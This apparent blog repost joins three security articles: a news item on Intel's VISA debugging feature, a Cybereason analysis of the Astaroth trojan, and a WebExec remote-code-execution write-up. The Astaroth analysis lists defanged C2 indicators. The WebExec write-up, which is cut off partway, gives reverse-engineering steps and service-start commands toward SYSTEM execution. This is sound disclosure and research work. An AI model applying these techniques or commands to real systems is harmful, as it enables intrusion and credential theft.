Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included with Platform Controller Hub (PCH) chipsets part of modern Intel CPUs and works like a full-fledged logic signal analyzer.

PCH
Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH —and later the main CPU.

VISA EXPOSES A COMPUTER’S ENTIRE DATA

Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.

INTEL SAYS IT’S SAFE. RESEARCHERS DISAGREE.

Goryachy and Ermolov said their technique doesn’t require hardware modifications to a computer’s motherboard and no specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086security advisory to take control of the Intel Management Engine and enable VISA that way.

«The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,» an Intel spokesperson told ZDNet yesterday.

«Customers who have applied those mitigations are protected from known vectors,» the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers will publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. Chances that VISA will be abused are low. This is because if someone would go through the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, then they’ll likely use that component to carry out their attacks, rather than rely on VISA.

As a side note, this is the second «manufacturing mode» feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in «manufacturing mode.»

Реклама

ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA

Original text by CYBEREASON NOCTURNUS RESEARCH

RESEARCH BY: ELI SALEM

In 2018, we saw a dramatic increase in cyber crimes in Brazil and, separately, the abuse of legitimate native Windows OS processes for malicious intent. Cyber attackers used living off the land binaries (LOLbins) to hide their malicious activity and operate stealthily in target systems. Using native, legitimate operating system tools, attackers were able to infiltrate and gain remote access to devices without any malware. For organizations with limited visibility into their environment, this type of attack can be fatal.


In this research, we explain one of the most recent and unique campaigns involving the Astaroth trojan.This Trojan and information stealer was recognized in Europe and chiefly affected Brazil through the abuse of native OS processes and the exploitation of security-related products.

Brazil is constantly being hit with cybercrime. To read about another pervasive attack in Brazil, check out our blog post. 

Pervasive Brazilian Financial Malware Targets Bank Customers in Latin America  and Europe  <https://www.cybereason.com/blog/brazilian-financial-malware-banking-europe-south-america>«/></a></figure>



<p><em><a href=Pervasive Brazilian Financial Malware Targets Bank Customers in Latin America and Europe

The Cybereason Platform was able to detect this new variant of the Astaroth Trojan in a massive spam campaign that targeted Brazil and parts of Europe. Our Active Hunting Service team was able to analyze the campaign and identify that it maliciously took advantage of legitimate tools like the BITSAdmin utilityand the WMIC utility to interact with a C2 server and download a payload. It was also able to use a component of multinational antivirus software Avast to gain information about the target system, as well as a process belonging to Brazilian information security company GAS Tecnologia to gather personal information. With a sophisticated attack such as this, it is critical for your security team to have a clear understanding of your environment so they can swiftly detect malicious activity and respond effectively. 

UNIQUE ASPECTS TO THIS LATEST VERSION OF THE ASTAROTH TROJAN CAMPAIGN

The Astaroth Trojan campaign is a phishing-based campaign that gained momentum towards the end of 2018 and was identified in thousands of incidents. Early versions differed significantly from later versions as the adversaries advanced and optimized their attack. This version contrasted significantly from previous versions in four key ways.

  1. This version maliciously used BITSAdmin to download the attackers payload. This differed from early versions of the campaign that used certutil.
  2. This version injects a malicious module into one of Avast’s processes, whereas early versions of the campaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an effective evasive strategy.
  3. This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected. This trusted process is prevalent on Brazilian machines. To the best of our knowledge, no other versions of the malware used this process.
  4. This version used a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and help hide the code it is initiating. Earlier versions did not use this method.

A BREAKDOWN OF THE LATEST ASTAROTH TROJAN SPAM CAMPAIGN

As with many traditional spam campaigns, this campaign begins with a .7zip file. This file gets downloaded to a user machine through a mail attachment or a mistakenly-pressed hyperlink.

The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware.

 

The .lnk file extracted from the .7zip file.

An obfuscated command is located inside the Target bar in the .lnk file properties. 

Hidden command inside the .lnk file.

The full obfuscated command inside the .lnk file.

When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw).

wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI). This utility is able to execute complicated WQL queries and WMI methods. It is often used by attackers for lateral movement, reconnaissance, and basic code invocation. By using a trusted, native utility, the attackers can hide the scope of the full attack and evade detection.

The initial attack vector as detected by the Cybereason Platform.

wmic.exe creates a .txt file with information about the domain that stores the remote XSL script. It identifies the location of the infected machine, including country, city, and other information. Once this information is gathered, it sends location data about the infected machine to the remote XSL script.

This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target. 

 The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment.

PHASE ONE: AN ANALYSIS OF THE REMOTE XSL

The remote XSL script that wmic.exe sends information to contains highly obfuscated JScript code that will execute additional steps of the malicious activity. The code is obfuscated in order to hide any malicious activity on the remote server.

Initially, the XSL script defines several variables for command execution and data storage. It also creates several ActiveX objects. The majority of ActiveX Objects created with Wscript.Shell and Shell.Applicationare used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders. These variables are used to invoke legitimate Windows OS processes for malicious activities, and serve as a bridge between the remote domain that stores the script and the infected machine.  

Malicious script variables.

OBFUSCATION MECHANISM FOR THE JSCRIPT CODE

The malicious JScript code obfuscation relies on two main techniques.

  1. The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign.
  2. The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign. 

 String.fromCharCode() usage in the XSL script. 

The random number generator function radador().

 These two obfuscation techniques are used to bypass antivirus defenses and make security researcher investigations more challenging.

CHOOSING A C2 SERVER

The XSL script contains variable xparis() that holds the C2 domain the malicious files will be downloaded from. In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to. In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain. pingadori() is a random integer between one and twelve, which decides which domain xparis() is assigned.

The C2 domain selection mechanism.

One of the most used functions in the XSL script is Bxaki()Bxaki() takes a URL and a file as arguments. It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file.

In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In order to hide this process, it was renamed certis. In this iteration, they have replaced certutil with BITSAdmin.

 Bxaki obfuscated function.

soulto

Bxaki deobfuscated function.

In order to gain access to the infected computer’s file system, the XSL script uses the variable fso with FileSystemObject capabilities. This variable is created using an ActiveX object. The XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files. 

The file’s path.  

The directory creation. 

DOWNLOADING THE PAYLOADS

The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files. These files are downloaded to a directory (C:\Users\Public\Libraries\tempsys) on the infected machine by Bxaki() and xparis(). Within these twelve files are the Astaroth Trojan modules, several additional files the Trojan may use to extend its capabilities, and an r1.log file. The r1.log file stores information for exfiltration. A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018. 

The script verifies all parts of the malware have been downloaded. 

After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded. 

One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth. 

The twelve downloaded files.

DETECTING AVAST 

A unique feature of this latest Astaroth Trojan campaign is the malware’s ability to search for specific security products and exploit them.

 In earlier variants, upon detecting Avast, the XSL script would simply quit. Instead, it now uses Avast to execute malicious actions. 

Similar to earlier versions of the Astaroth Trojan campaign, the XSL script searches for Avast on the infected machine, and specifically targets a certain process of Avast aswrundll.exe. It uses three variables stem1stem2, and stem3 that, when combined, form a specific path (C:\Program Files\AVAST Software\AVAST\aswRunDll.exe) to aswRundll.exe. It obfuscates this path using the fromCharCode()function.

aswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for Avast. If aswrundll.exe exists at this path, Avast exists on the machine.

Note: aswrundll.exe is very similar to Microsoft’s own rundll32.exe — it allows you to execute DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.

jsfile3

Stem variables presented as unicode strings.

Stem variables decoded to ASCII.

MANIPULATING AVAST

Once the XSL script has identified that Avast is installed on the machine, it loads a malicious module Irdsnhrxxxfery64 from its location on disk. In order to load this module, it uses an ActiveX Object ShAcreated with Shell.Application capabilities. The object uses ShellExecute() to create an aswrundll.exeprocess instance and loads Irdsnhrxxxfery64. It loads the module with parameter vShow set to zero, which opens the application with a hidden window. 

Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exeregsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry. 

 The script attempts to load the malicious module using regsvr with the run function. 

Procmon shows the malicious module loaded to the Avast process.

Procmon shows the malicious module loaded using the regsvr32.exe process.  

PHASE TWO: PAYLOAD ANALYSIS 

The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer.

 Information pertaining to lrdsnhxxfery64.~.

After unpacking the module, it is packed with an additional inner packer Pe123\RPolyCryptor. This module has to be investigated in a dynamic way to fully understand the malware and the role the module played during execution.

Information pertaining to lrdsnhrxxfery64_Unpacked.dll.

 Throughout the malware execution, Irdsnhrxxxfery64.~ acts as the main malware controller. The module initiates the malicious activity once the payload download is complete. It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language. 

 The main module collecting information about the machine.

CONTINUING MALICIOUS ACTIVITY AND MANIPULATING ADDITIONAL SECURITY PRODUCTS

After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW()function.

Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe

Irdsnhrxxxfery64 injecting lrdsnhrxxfery98.

The malicious modules in regsvr32.exe memory

After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded.

  1. If Irdsnhrxxxfery64 is loaded using aswrundll.exe, the module will continue to target aswrundll.exe.It will create new instances and continue to inject malicious content to it.
  2. If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes:
  • It will target unins000.exe if it is available. unins000.exe is a process developed by GAS Tecnologia that is common on Brazilian machines.
  • If unins000.exe does not exist, it will target Syswow64\userinit.exeuserinit.exe is a native Windows process that specifies the program that Winlogon runs when a user logs on to their computer.
  • Similarly, if unins000.exe and Syswow64\userinit.exe do not exist, it will target System32\userinit.exe.

The malware searches for targeted processes.

Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe

INJECTION TECHNIQUE TO INCREASE STEALTHINESS

After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source. This new process is in a suspended state so the malware can unmap its memory and write its contents to the new, allocated space. Once this is complete, it will resume the suspended process. By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process.

Astaroth module creates a process in a suspended state (dwCreationFlags set to 4).

Unmapping process memory.

Writing content and resuming the process.

The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~Irdsnhrxxxfery98.~, and module arqueiro

The downloaded modules found in regsvr32.exe as detected by the Cybereason platform.

DATA EXFILTRATION

The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate.

monitor98

Irdsnhrxxxfery98 information collecting capabilities.

In addition to its own information stealing capabilities, the Astaroth Trojan campaign also uses an external feature NetPass. NetPass is one of the downloaded payload files renamed to lrdsnhrxxferyb.jpg.

NetPass is a free network password recovery tool that, according to its developer Nirsoft, can recover passwords including:

  • Login passwords of remote computers on LAN.
  • Passwords of mail accounts on an exchange server stored by Microsoft Outlook.
  • Passwords of MSN Messenger and Windows Messenger accounts.
  • Internet Explorer 7.x and 8.x passwords from password-protected web sites that include Basic Authentication or Digest Access Authentication.
  • The item name of Internet Explorer 7 passwords that always begin with Microsoft_WinInet prefix.
  • The passwords stored by Remote Desktop 6. 

NetPass usage.

ATTACK FLOW AND EXFILTRATION

After injecting into the targeted processes, the modules continue their malicious activity through those processes. The malware executes malicious activity in a small period of time through the target process, deletes itself, and then repeats. This occurs periodically and is persistent.

3 ways

The malware’s different functionality.

Once the targeted processes are infected by the malicious modules, they begin communicating with the payload C2 server and exfiltrating information saved to the r1.log file. The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform.

The malicious use of GAS Tecnologia security process unins000.exe. 

Data exfiltration from unins000.exe to a malicious IP. 

CONCLUSION

Our Active Hunting Service was able to detect both the malicious use of the BITSAdmin utility and the WMIC utility. Our customer immediately stopped the attack using the remediation section of our platform and prevented any exfiltration of data. From there, our hunting team identified the rest of the attack and completed a thorough analysis.

We were able to detect and evaluate an evasive infection technique used to spread a variant of the Astaroth Trojan as part of a large, Brazilian-based spam campaign. In our discovery, we highlighted the use of legitimate, built-in Windows OS processes used to perform malicious activities to deliver a payload without being detected, as well as how the Astaroth Trojan operates and installs multiple modules covertly. We also showed its use of well-known tools and antivirus products to expand its capabilities. The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products. As we enter 2019, we anticipate that the use of LOLbins will likely increase. Because of the great potential for malicious exploitation inherent in the use of native processes, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.

As a result of this detection, the customer was able to contain an advanced attack before any damage was done. The Astaroth Trojan was controlled, WMIC was disabled, and the attack was halted in its tracks.

Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above. LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.

For more information on LOLbins in the wild, read our research into a different Trojan. 

LOLbins and Trojans: How the Ramnit Trojan Spreads via sLoad in a Cyberattack

INDICATORS OF COMPROMISE

SHA101782747C12Bf06A52704A144DB59FEC41B3CB36HashNF-e513468.zip

SHA11F83403398964D4E8B6C70B171C51CD278909172HashScript.js
SHA1CE8BDB56CCAC55C6881701EBD39DA316EE7ED18DHashlrdsnhrxxfery64.~
SHA1926137A50f473BBD257CD19E207C1C9114F6B215Hashlrdsnhrxxfery98.~
SHA15579E03EB1DA076EF939196CB14F8B769F30A302Hashlrdsnhrxxferyb.jpg
SHA1B2734835888756929EE3FF4DCDE85080CB299D2AHashlrdsnhrxxferyc.jpg
SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferydwwn.gif
SHA1EAE82A63A980998F8D388BCCE7D967F28309F593Hashlrdsnhrxxferydwwn.gif
SHA19CD5A399C9320CBFB87C9D1CAD3BC366FB12E54FHashlrdsnhrxxferydx.gif
SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferye.jpg
SHA14CDE9A53A9A49D606BC89E74D47398A69E767056Hashlrdsnhrxxferyg.gif
SHA1F99319B1B321AE9F2D1F0361BC756A43D25444CEHashlrdsnhrxxferygx.gif
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1FAHashlrdsnhrxxferyxa.~
SHA177809236FDF621ABE37B32BF073B0B893E9CE67AHashlrdsnhrxxferyxb.~
SHA1B85C106B68ED410107f97A2CC38b7EC05353F1fAHashlrdsnhrxxferyxa.~
SHA1C2F3350AC58DE900768032554C009C4A78C47CCCHashr1.log

104.129.204[.]41
IPC2

63.251.126[.]7
IPC2

195.157.15[.]100
IPC2

173.231.184[.]59
IPC2

64.95.103[.]181
IPC2

19analiticsx00220a[.]com
DomainC2

qnccmvbrh.wilstonbrwsaq[.]pw
DomainC2

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».

Картинки по запросу WebExecThe summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.

High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.

Credit

This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!

Intro

During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!

The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.

WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on webexec.org.

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:

c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look

Deep dive into WebExService.exe

It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.

In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!

hToken

The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!

If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!

lpCommandLine

This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]

You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; &quot;ExecuteServiceCommand&quot;
  .text:004027E6                 push    offset aSNotEnoughComm ; &quot;%s::Not enough command line arguments t&quot;...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:

C:\Users\ron>sc start webexservice a b

[...]

Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the string is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimum amount of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!

Here’s our new command:

C:\Users\ron>sc start webexservice a software-update

[...]

Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f

[...]

That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.

This one took me awhile, and this is where I’ll skip the deadends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you’ll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line with an error — wcstod() is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.

